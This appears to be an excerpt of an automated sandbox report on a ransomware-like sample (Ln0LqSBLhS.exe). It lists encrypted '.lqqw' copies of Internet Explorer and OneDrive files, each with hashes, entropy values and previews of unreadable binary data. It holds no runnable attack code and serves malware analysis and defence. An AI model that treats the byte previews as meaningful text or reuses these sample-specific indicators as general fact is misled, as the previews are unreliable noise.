                                                                                                                                                                                                    Preview: .;oNJ.y...2.."eG........q.2.....].w..!..G..t...2.1.bC....,,.n\r]A* .*.*C....UQ..K............B.x.e.]..R..?Y].J._a.:B.m^.H=..m....\......"0.@..O.l...~p.'..T.=9 ....Mud....NQ..........S.5..*..&.z...}..Y%..d ...f 1.S...;...(Z..Z.....V..3X.2Z..FN[.0...e.....J.U......1..s.U.P}c......!%1...OzS./Y.......<U.5......{@...T.O..vM..>1......B.R.f='n..f.t.98.~{.....wc...0I....}..7..|.XQ-...y`...uw;.;W...6H...;./1.......... ..e)R.....0...;.X..]._.r.8A.....ha%.aM...H.j.F.B.?`..2..6@.\;.X.`.ZK.(R.lA!..X8....75x.Z.hr...............+.u..P.*..1.....gq.....xv.".2{rI......g9=a.._..d."..w.".....:..-a...~...E.....C...d.....y..$3.....I.E~p...........dW..$X...[g.a....B4..S#-..T.Y.s+.5....cB<Zc..F...T..>8\...G...1....._.....C.../..Y.;..G..C8Z.G. ?n)..f..x.U..@.sQ.m:a.I....}..Nz..C...AYr...V#<.....O...f.......H..#s@.n.%B..+....~...?kywt.....SV..N.9.Y.^w...M...4^..&p......L........c.Zb....".Gu..b..3*..,\...s.;)o.G><jTT,..F|.o..Q......?(....[;.7IVx-.!..../>...]:0...~.....u...
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\Internet Explorer\UrlBlock\urlblock_637194112741176080.bin.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):35946
                                                                                                                                                                                                    Entropy (8bit):7.995196562820894
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:768:PhjRl7nU0r2lyRYCMX1HGtTGnfU9EdA27UXN:P1nKSUFwqfUa78N
                                                                                                                                                                                                    MD5:F2444EE78558517140223A2F94863492
                                                                                                                                                                                                    SHA1:2AD99F880CA93B3D5D9D1A1DF8D322623709029F
                                                                                                                                                                                                    SHA-256:FA01DE2EDE9E6A9AB3E071DC7ABC09C7099558B3EFFC318D11EF84038015B2E7
                                                                                                                                                                                                    SHA-512:646AA13AFF9D39D3F666D0591B62B3A661D3F9E25FA089B633B85FA4DCDDA6FDD0912D04E543BEA506FA845B4DC51952C41D77A4C15D54D021013BBF04527AD4
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .J*........CM.)..5{(./..Ad.0....%.g.(....C....K.u..{A..$.}....r.k.i{......9UY:5J..+.t.aN.sx...0=@.T..........q. ...D\...Li....D.......>.i.P......'{....|....Qsm.mO.J6=..o!Af...i]..pz.....e.l..'.~...$.+k1+1...e..g.=n......<^dr|.1...UM..b#..}:........v$.WI.^$...6^.j.].X....f=.%...d.?.U..u.. z..R........y.....E.Qk.....n..,.fO.....L..M.kl.O.GG...#[.1.,..l..*..Wx....$W.J..a...u...v...2.MS%{.z5.~.4.=[...p..<..j..W.T...|...}..?....@.b.....5...<5.ri..e..CZ.e[.U...8....H.}.bX>.....sj.....{..=D7..:.|..\TP$.#...9-.N.y.r".G.xJ.(...:..K.7..c.=.1..5..t.c!.......&...j.J.:..d...6....J.-?....a~D.3h...Zt.G.^.*.R....&.).........%s.o..z..s%._{Y......u......4. .....J...!..H.....B.>.rQ...N..m.....&bX.x.nK&H..R....G)W..`.}.0Q.C.\....;6o.....8....:.....q..i..4..1]8.X.{.i..EeU...|$3....Hzk.Pd.....Y....4...h..a}...L{s..C<..a.E~.m.B.......HY/b.P..w.k*.........g.7%....>f*.:.Aq..5..#....d)...Q.?.t.9.....6.^LC..C..>....S..9.%-...VO.M..k.\..hu\...'.B.....4..._OCT.
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\Internet Explorer\VersionManager\versionlist.xml.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):16174
                                                                                                                                                                                                    Entropy (8bit):7.986307416528161
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:P/0SOJ+F32ueP04EFpFdtslre9FDLzkCSOpgEqC8P7e6J14b:dOc3264M3dtslyPJrzp8PKM4b
                                                                                                                                                                                                    MD5:F551CCAC5688D0B2DB91B097B8F5C604
                                                                                                                                                                                                    SHA1:831408C8FD88CAB256CAB10E7014C65D6DBB6F2D
                                                                                                                                                                                                    SHA-256:74EB366E308F5F93F1D9BAEEB1B2274F06B18BF1F8A0B5054A2F2E9FEA4133A4
                                                                                                                                                                                                    SHA-512:C94A295C352ABEBD1851F9DA2B3F5AD973C242D2E00E907A7B577458AA5B89AB976AF44239A8473583B451AFDD51A9AA14C6818B945BEC58DE51DB44437C9054
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ......9..k...N....."Y.6.C()....C.Y...?.....87...@.=A..L_P..-.....ZV..~..'..Y.J.j+........p.$...6.96k.......I......*../dZ.<T.U....5%.]..Q..a3.f.....A..t..o.].<-Gq......0.i....0.B..pE..=......'..........o.S.%r8.M..?jwQ...{.rT..0.Q.,/-.../_xW.].2x.aR....x..\.9z.9.Ap}pN.....{...{.|.k..3.s$.G..Q...'...M...f.5.>[.k.q.}.9Q.Sp.."..}..uN..........@.z...v..~..Pu.J.5f.._t..z....qQY..z....M.Y.as0....n.............|..%......t.s....aV..#/.....KM#?...A....pF....2......9..<wf(D0......_J.p0{........8.3.Yp!...T..t.#1..._I.ZR..).Z.C.s...kZC..s|..$O`2Q...X.......IZB..4.....a..-....t....(.......R.%.>......R.p.....X"....K.".X./...Y..K*..m.......sj..#...,.(..z......}..V(...W...(.8..........G.F.W,..@....u...z....'...0.U.....[;.Y.........k........'.OA.......dZ..c..DN"+.Z.......a.v.}..X...G..R%7.r.vA.'.d.5.E5...p......#y...0 .."Q.^...@.5..1.f+.D."z...w! .D.....JA....,..UY.^m...^....7....x.oZ.J.z4.x.^cw^..6.W.a...d.IgC..<...y.8>..........i...R.R..C!...yD_..m\.<..
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\Internet Explorer\brndlog.txt.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):6901
                                                                                                                                                                                                    Entropy (8bit):7.975849471324671
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:cTOgRs41kco4SCSpJ0lWI5W25TaXbPdAGddYjKbEuI8w9pFK8v:+iG+4ap05T5TaXbPdAGddYjKAZrv
                                                                                                                                                                                                    MD5:608592A0743ADD8B8490CF1F53C18195
                                                                                                                                                                                                    SHA1:DA17EC502BE96119EE79BA54F9DB6ACEB60D6AEF
                                                                                                                                                                                                    SHA-256:9C5A8C024E08CE63FF6365D1E2897CD7CDB4BA2801DD71D2EEBCAEE5D1352363
                                                                                                                                                                                                    SHA-512:04B83AB90CA574C0552E62CE94DBD9C3CD0D3E72011F4937FD349F664B2C041834A257DFC5743775A5872020D4CEC499DC988D3091AEDEA2B03F3E611E4062B5
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: n...W<.^.....<.|9.*~e........+...,G.e.....'.zK.l; %S....P..........w.[..P..nY..iH..6...n....`...j........17..uYX2....<.......FM.....wc..]g....o-....8...3.."..o...2.r2:.q#.K..o..&Pg.>/j..H..ss..)...... .s...FQ....P...1;....a.A\P.....^i.~..Qb..!%....I..r.O..O.i7...K..qtf|..k.........K.b1.h.l:{..g.3...A.L..X...............o.B.H,....+...q.+c..M.&...1...3.1X.B...o..4.$.....|..Ro.P.3...*..5.N@.{~c.W.....~e.+:..Id...c..M1o........ON....]=;.R...9.D2E..$L.r...J..%.Ql.I`......$..\......TIj..U..%..-"....uI.r7.h.OX[m.ht:..Xe+..i....j..CS(}...JG.c.....9...<7.J....3..-B.....%[..P.Wd...s..I)\Q3..K..VT...K.Ks6.ia..n.h...\....,..z...c$...(....^vW.....b.h..+..L.....7.........m39....<.....Q.g.3..........&....7).]..0=...8.:.l%.G.,M.F.....m.dg...pj(.........0B...m?7>i.o....,.".\u+.!F.......Z/.....UF'G..t....I...FEC.g.(4..$........L.../.XFr. ......t.1...b..&....a.."..|."...2.h...]7.u....T.U.bkFg.....<y..C.+.`...d.J.Dtj.miJ.]}...W?r.u.M.`.R..I.....N.e
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\Internet Explorer\ie4uinit-ClearIconCache.log.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1267
                                                                                                                                                                                                    Entropy (8bit):7.832950728347821
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:hu3oGw2suK765XVazbaIT/gfpiMfFhf8hbtBKpyVD9bD:koGwbIVybZT/KpdLf8hbtQpyVxD
                                                                                                                                                                                                    MD5:8ED38A80239064712D5A63749D5271D1
                                                                                                                                                                                                    SHA1:2876BFB1C6C8A94E1ADBE43553C20E78821757D4
                                                                                                                                                                                                    SHA-256:EF6381492AB6C180749D48B2EF903A1AFB1AA2499ECCD462CB40311E9F217426
                                                                                                                                                                                                    SHA-512:80BCF65D34FEA47F8421CC227E2583D3A8FF282A0321AABADC35E800E1AE87EAC1FFAF5BB106E29354B0BF74E66168E1BBB238CA9EDEA67952BC8E57F18918B9
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: a.....O...`5...=u.g......k_.\O_.{.:BX(.^....9./vx.YT....]..!.C.(...S.3{.'..t..NG...I.#..2.....[..>K.$...!8.!s.F.G...D.....jH.^.......d,...q0...q..|x)I.#..,o2?..B..&.O.G|.Y.mR"B.o.7#..2.w.drh..".[..t........p.~.D.AS..O........'l:Q........n..a..P8.{|.....a.].......z...6...g.~]).._p..q....%..D..r....@....}.R...].....!.e..$..i\....y..m..Ebl.U./.w|..8..........R..Id~..O...0Z.Ip.Lg.. .b."..[`.Rx..a.....b5.9.S<:..B[b...&.-.G.!...}7.[).E....!./........x....9..X@rU...B35B.D.N.[.ud.s..C.D.".[..n@,z..9..H.p.........+....D&.u...*......Z[...Q<.!..W..5.O..t=X....QqR.G.9...N..`I*...{g;........|..z.Q...T...F.p.......AU....IH.MM .....=....rR_....l.~.Ip..$...`.&p... ...p.....G!.r#-..t..M...IHUPbj...lA...N...._'...|*..]749../........n.nU...obArS..]..'...._.G..X.V8.\...%...._.g.S.Ia>.z./...r......9.O>nG.uW.G(...5.y...(.Y...K..O..|v..... ...x....l..OV5,..3Le..L...6......gp.."..l 6.d9.3.M..p..A.9...H.B0f1......G)....CM......F6.rp.......&.S.B...F}C...|....*pk
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\Internet Explorer\ie4uinit-UserConfig.log.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1643
                                                                                                                                                                                                    Entropy (8bit):7.880980242467092
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:bM2TTzX/Xu7EkmKsEzV6GkFAReUQIww7s3TZD:IozXfQEZKsEZ61Fw3wX3TR
                                                                                                                                                                                                    MD5:BBE322FBF74E0FFDE6F6B0777EC6220D
                                                                                                                                                                                                    SHA1:34A8B3DDE5109BB7B5AC238C573B0D2C014CFB95
                                                                                                                                                                                                    SHA-256:B4CBD4B4A164571D9E5CC5464D2074BDE9568DEF8726A1E8CD8D05E1FCA53FE8
                                                                                                                                                                                                    SHA-512:C4EA550CF292A4336F69AADCAF0918F4AF0F0C042A4B6F6F68AE75DDD2DEA4D6B0F48297D8CE027F37551C6D0DA47FB6A765EC328BA29CAFE661D92AF6C5E09D
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .6B.(_..|...G.B..G..Q....-%.S...v...Bb...VW...u..%...'i..?...m.'bxAt.M..B[.g....."9.n....-..!.B.(...a.R...]N....I.....ZU(.^ ....Y.....+.W.n0...Q.... ...hu.y.5I.....G....e.kw.D...P"..O....p.7.o..B......e..#L^.."...PG.r.b.v.(...|..m...%....M.... .ehpu....":...x<."...)>...e1...Y`'.P.P.:t...u....Kw.w.b{Rz....@.....wW...[h......~f.w.:...=wF..#..=f.r.C.B.4.+&......%...V.S.o{..o....C..8i.[.i....c..D)...,...s|.......A6..#............<.\.(.EU(.......s....#..........5....}....z....?...c*..'!$.L.o.?..@....R...A.C1...3L..EZ.2'S2..>.....4..sf.vG.......|..T.......F+...........*&M....@..Ff..:.E.2........!.....y.c.{.D....u.{ik-..k..R..{.......e..LuohT.<.]..._..R:9`K...S)..:..d9N.....o.{..E..H|J......'5..@..?.|..4uwL.??l....~+..LV]...j...`.......:..+..+q-.......;... .............N.byc=....!X.....3b.3.q.......;..U.a..v`x;&..:^.1.8'+.>.M.....yd.....1.9.a...F.R.^z ....2..u..Q.........4....!>...U......Ki...2".t$T.... ..C9.u...n..*.".z%.J..:..-.w..........)...]..
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-100.png.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1478
                                                                                                                                                                                                    Entropy (8bit):7.883842143484792
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:mKn8FzEuG0I9XPeAfnNUQxFBwdnJs06ntMAtwu83qiWmWIpadX4jG1w0XbD:mJSJHNfn6QxFBov6tMAtwu8aLgQ4yrrD
                                                                                                                                                                                                    MD5:4F9986F07AD7609B8928037D3CA38B3B
                                                                                                                                                                                                    SHA1:4B270F25C31E6C150FA096675EDD224B049EF321
                                                                                                                                                                                                    SHA-256:86DC85767167C28B19EFD2B8F83734FD32F6BFA3E2D61FF55CBF7E335586C4B7
                                                                                                                                                                                                    SHA-512:648761AE867216B98F3F1046D011D10852C3D758B142377C739EF04664BF7B9112DB45CD1FD874DC438C8FF6636144561C25B1A517B9AE819A858B40A7EFBD34
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .@.O....svzacD%..l.......A...m.<.<.....+=;2rR..L........9.. I..]...6..O.].Pa.l..|.......>.HI.....7+.."..j.;..!.`....&.......#.*.....MJ....".3..TF..?8+.jN.$...PR....\...N. ......C.}.J?...z..(.".a../4...'......Y..;e..8.~!...W..SK..=..t.|.p9E..q.X.....i.5._..A......[..`.i.!.r.y..hf..]o....bX.....&@wve.{..,.c.*r..>7..jk.R........k...........1.T.....^.x./.F..@ o1(.t*/......gPx.e.o..-^.q...[d.7Q.%.t..G.Jy.L@@j.....Gt8...y.$....h..p....L.]....Q..-......b../l.w.u...n^......."..5..a...z.>Db..b.CYy...*ve..~....{'d=.......I.*u.+E,.\.........<I. .#....l..7X.R..2.R\......Q1.|.|.\../......h..G...*}|...Z..=^.>.h...d:......*w.....!..R>>..z_.`A...e.+:.......kZ...1.\...wp....~..Nth..]..Z..1.....2h..f_5./..q......!.o'..O.......u.(i.....4|B..BV.(X.w..B..N.#y...FYG...kEk....fJ..2.M.D.K.@[...u6D4.G6..t...{%$gd.'...)........L(.[..H.....?p.....[...w..Lq`..$:..S.............ptC.(...)D...x.Z.D..,.EaB...[[.F.........C{..~..knjS..R...5}.{....!M..{...a......R.a..&
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-125.png.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1872
                                                                                                                                                                                                    Entropy (8bit):7.874657425686683
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:esST6RHtRv0Ej45TlXjQ6tMGw/mdzUbSo5GwgoQuGHVpASVzD:dCK/0E6XjlTwdYuGHVXF
                                                                                                                                                                                                    MD5:CE5880D758A9B17C5FEB3606E3B3012A
                                                                                                                                                                                                    SHA1:5F55E06496FF642B96E726A4CA31FF2EBD0A5DC8
                                                                                                                                                                                                    SHA-256:22033DFC59BE2B1EBCF4E44C0A8F71ABA25ECBC815F8DDFECE95FE3C9B5BEA8C
                                                                                                                                                                                                    SHA-512:591ED39E0270EE0933D2B8AFACD56B4DF91A3D2FB0D0E4BE60C76CA5BF3FA6EC8538037E8E8140497248A76ADFAC9998175778D6E855CCAF2FEB74CB8E6A5A77
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: sJA..z..+MX.!......`&#I..e....O.^w...V.&.f<._..p#.d..".CK...mx....$..N...bN.7.s......7.OA.Tc0..g.ti.W7.F!.G*EO6..z.m.n.o.g.z....)..\.F.JG..q.lx...I8D......o}.<.%..`j.T.....d..hc..]..5./.r...K%.......n.t&...m8).H.....].....J......e.}{6...UN.....&T.......?ia.|..C....]t...../.c.....|gx...s.).s.'...ty.....J...W{....&.D'Cy. ..c2f..O.(g...~...*.....5=.FY<V...5,M....x.[$P.}Euj.L..;G%....p..F.b.D........v...n8rhb....Z....M...R..J.+N.....A.......C......|.#..&'.;{......LU.KE.=.....F..n....J..!.S....j.P.2Z.2...4......]...Z`(g.{...:r/.^q../6..b.......<1iq.x..h.U..>..j..}w..6.d.7q[...}.f.{ hg=$p..t..e..r...w.J...iC.;z.......7...#..;uU..07..jI;.r.V]..:.t4.;N.B....Q.Y..U..........kk.......M..b...uI6....R. .!.4|z.jaWe.04.P....^4.Q.m.x;...4.tT..E.gv.@...ID..$.[X..I*...L."..o@_.f.A.k....o./.}4.]T.....e!...&S.wo;...].m.........V.._j.9....k...&....L!.&a.-.L.!b&.N7#."...mEZ..(..r..a.3...#s:..rrt.q)....u6.uW..:..Y..>..].......vO.mD....Lh...$.UX....}.g.[iM
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-150.png.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):2458
                                                                                                                                                                                                    Entropy (8bit):7.920433423336652
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:FJJDMiRbiCGrs2iJvFL7FRcjZYZKhd9LXmD:FJJDMiROCZ2CvFLT+Tr+
                                                                                                                                                                                                    MD5:3E29C96469AA4D3C1C30A1EE8567B5BA
                                                                                                                                                                                                    SHA1:B0BBC1DCFF7514CE0DAFF307AF090EAADF7E6C3A
                                                                                                                                                                                                    SHA-256:A965FC16E92920BE62E62831B5D6877ACE7E0FB9A5BA2EBB58E3449A862AC4B9
                                                                                                                                                                                                    SHA-512:2077F6B6907CF05E95559A506557EC280C1BA8C1A948D0BC2DA800292344E821C64041F8C0C309BB7B45D0EF1FA8172EC0805CB0B42B95608A3446E01BDE4549
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..J......@.(<9E.GI..G.2.=z...?Nb...)......F......;qm8.<`x&......o.=kk3-.c2..~3........r2....]s....@...g........s.b..tvQ.d.w....v.....+n..|.R;..2<.....>U3..r8]..a.<ZU..yl..`.G..v.>..}....D..j..6..%t.Jres.(....i......y....0.2JWZt.?tN.*.:.*.....g.a..>K.....`Aa&.4.IM.9..P.t5.. B...2z........h.CSZ i..\,M....z.8.'.......V|.P....q*'Q(...[..W..X..>.J...#l.........=ek......6....).....13.......krjJ*...y..s..u......:..D.2.}9<`...1.Y.....d....Qc........'.V4.pD....y...>....(..&.xLE...&.>...G.s...'&...|W,l7/..*T".....O.Y.;.9...g..\..[..~..YZ..;.t......}h...k.q.>A...d..C.eI.....1...].q .....].......]..WL...S3......y.@...........L....OAH.....R..{..'"...-...F..-..8;.|.n..~.1'...'.(...3.A..<2..18.......DV......,...x..).-...(U.z.%9q.)b.Q...l}I}..1.P@~....i...#..6..b.9..RG.Z<~~..|..X..d.>.'.S.[...[8...h......i..H.&...C.nqh..!g.......c.u]..:......dW3.....l.. #.!..`....l...C\^..?....g.. ...L.n2i...f.G...p2..,wy..\4.A.i..*Zy...q0.6.|.r..2.8..#.q..O1..t".3.H.G.8.S
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-200.png.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):3081
                                                                                                                                                                                                    Entropy (8bit):7.925866760021877
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:Le+S1R4TRhsoeJQ/4fVmk3RjuyPRhy+jGgixks:nS1R2soeW2mktukRhy+6gixks
                                                                                                                                                                                                    MD5:A0F0ABBD9AC5F950E1B0DEDCDEF36E45
                                                                                                                                                                                                    SHA1:C9B689AE0CF9B9FC71DB84568DCB67296B577560
                                                                                                                                                                                                    SHA-256:6EE6F8C8FC5170CE0456F1D55E121C7EE744D6E0985F9770EA8245C978F7D404
                                                                                                                                                                                                    SHA-512:FB08071203D7D5A3EBFEDD8BD29B94512AD7805359150811156D11091484365D65BC36D897D080F7404DA1DE427FB426CD6CC0CEDB1A965074EBF43103EEA312
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: d..T ....(...V.:t..OTy\B.0...>.E._.,(.S..D7............f...r..p.UQ..`-...x..u...".>..$vpWEMB>..Ty...5..$..6.hn..r...:.Pm...yo..i....m.........'..F....dF.......l.S.yf......a....4...#@Ie.:J........W.B.....o..fk..v.....hk"..D..%5>.F..t`C....3.lu...(.>.~.b.y{.'./.&?.u........*.WlT..J.<.VZ8) UT...S...c.9Q.8QLD.no......?...$F`Y.}.,...v.v....[...|..f.b.....jv.. acK.+%..........]..._.......%..r.*.......].'.sD.....K...-......').PF.?#........yyb;/......T.(A..i3.....M.5.!..*......E..CQ...-.....{>+=........-~"|..m..p;E..%..&....lc.......`.u....m...K|y..Mu......db...y..xE..=..I....a..._..}VU........>J<.O..........'D..W >.D...KrwMm?...T.Q..Uo../a.....S.o<MA..r(b.S..5...........!...c.9.O..4c.}:....../?.R..B..#.5..#C.._."s..F0_GW@.... .@...L........."..X.K`.Xu.......H.....sNe..Cw._R...q.9....=..\2......F....<9.#..p9pt~..Rn....?.sz.)...j\.....)....i.......U..}...7>..~.0...S.B..#."..z.]..z....!.......%;c...............b#......wJPB..E|dr...A.L.....@T.V;b.V.5..j
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-400.png.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):6940
                                                                                                                                                                                                    Entropy (8bit):7.971881121482384
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:Obj2TYwNASR88i8LVUeqsgh4wVF+fYOP51B:g2x3S8ikJHgy8+fYc51B
                                                                                                                                                                                                    MD5:8912888BD2D5223DE7F3EDABEBAA8D5E
                                                                                                                                                                                                    SHA1:C8880C971469D5ADC2EE4BC84E97FD410B4FB41A
                                                                                                                                                                                                    SHA-256:481359CEC7C470CCEC1B1A98F54813BED224FC35BFD8373BD5D0E78489301541
                                                                                                                                                                                                    SHA-512:DF0BC8A2B43FAAB382D9C567E53C989A284F9F587718A312142422847670281EA8147E1FD6B9BE80447EFFF2087464A638F3225DB0F6E85259BEB9AFE850ECBB
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: $u...S.d..Zg.O.4..D.(.:<C..."...W.KAZs.A.a897..h.N.az.]..F..3?.g..m....S..L....p...~...Z.J.v7..&..5h2:H......P...B_..'3P...&..O..`1.*..2.5.H.Z-....L.......h...'.x..,..*q.".C.eX.(fz..f....e..............*.$....R.q..5d&{..-._......,|.p$.U`.}r.....%*.......$=...j.2:......mo.x....HP..6t..M.r....cHY....l..s.%.....B..BB .K@.J.qaZ..KZJ.zG..q;.../#....f.i2..].....$...x...'[W.<Ar.........C.5i^...C-....<.3.LLC.(...h/R...uE.3g.^.Fi.}.'..q.8.f.-....].i.z.&..h......\...X...E...#\.q.|......<..-.....:.....-.cW....p+..).....x(.......]J..R..|..Xp.b..jf.l.B......."...%:.."8..b.=.N!...........V.,....I..-.d%J.o....l*.L.[.oM....wI....0.\...F...b*$..).8.G.o..f..S<.s9...J&..l.V..Q.d...5=.H.. .8..]..c"...Q..._q..>........p.q6.{.......s ..{...'..)..T..>..uT...Y..S[H...I.Lys..U..}.o.!...*. ..90|...l.=x,.G.S@...N......?.1...y...p~...E..i.b..P...x........9M..V,o@r.r...)..|uH..a........(.&.Q...9.}..YD...( .:..7..Y.p.3\o;.T.`...r.}.?...J.=.=....HJ1Q.......R\..........
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-100.png.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):3030
                                                                                                                                                                                                    Entropy (8bit):7.934122066589496
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:Oz19Ji2+XxPk2VQwuDo7ghIazgOVqEor9cRl/UrzikU85ZpfrBFI2sZ126FwcRys:wVPus8jazgoqJr+r/Y7ZP6LvFQYU+x9
                                                                                                                                                                                                    MD5:44233ACD0639379924F7C5972AD0F870
                                                                                                                                                                                                    SHA1:49BE07A6A8C272CE6DB8CC894C4DDCCF48C58C67
                                                                                                                                                                                                    SHA-256:88E3EFB085BAF24C8148E018AB61EE2F64D020EB11539277F2D63C4A64D973F3
                                                                                                                                                                                                    SHA-512:26E61FCA2C2D375769F97AAABFC42F6A275586334C2C575CDE8DBE8495C1206B582F4290BB0295013931BD4A45D74ACCDA95568EE588AD509F0C82EF473B52F6
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..I.:...:..#....h=i0...T%..j%$..N.$.fp.,y.........7:b.>..;h..j.*^..$."lW.........!.....I]t..}HJ~..K....2W....\B.M&c=.....<S...@\..'+...1]......=j}:..6.&.....k..w..L4..".F.:...v........Q.c....G..lC.....>..."..h..0.$ME.m......`.L.Y..~g.........."...\.E..G.o..6...)..L...x.Je\..7.....z..%R. (J.a....P.Gg..G.QH!1k.C.'.S...)#..r........7.i...-..MY7un<..P#..;5...B...).9..1)...#..C.}.M....}.....D....<..51:..>.r...K....x.*.S......8G.....d.=$.f]'...4........6%Nr'3n..zS.r{j...`.M.nY..A.Oq..f.).GSm.8.}...M}.x..0....j#..7..9.~.\.KG,..._rZ6>.r...39.G....Jy...^.v.I...cX..j<.7....Z. .]Z/.|X...~..Ph..~....i....'...}....b54.B..-....H...x..M.b]{..@[...5+...?8+.v;../Gr.;.L... -..]..H.;.K...|.g.S..\.s..S.."..K..I.f..6.|..t.....4d?j].PM........_..`}..[....$......>"]\(..$.&.5 ....."k....8.........As.,.gJ......0.w>.......P.xW...._..S..:.....bg..&....].F.<...............}.F... Q.^..Z....<0..A.^.......N.N.~[#LJ0.^?..^..F.^1b...z.Y.VB*.....6F/..............h.cI.M.:....
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-125.png.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):3457
                                                                                                                                                                                                    Entropy (8bit):7.9413164133308864
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:mZH1qGqhDxGxqz7t/2WL2ACCr+RnnjetW99p/sPh02v+i:GcVWqzpOWL5a5njetWNIh02vp
                                                                                                                                                                                                    MD5:62E6998AF1DACF8CB923D70CAD195409
                                                                                                                                                                                                    SHA1:6E30E3D0EC426D42E268359FAFB0B24F08308B62
                                                                                                                                                                                                    SHA-256:8DFF3A8E0CF62DB438A1B64C0B42B3EA3B5D2B54E3AD02E4C73F75E30536AD57
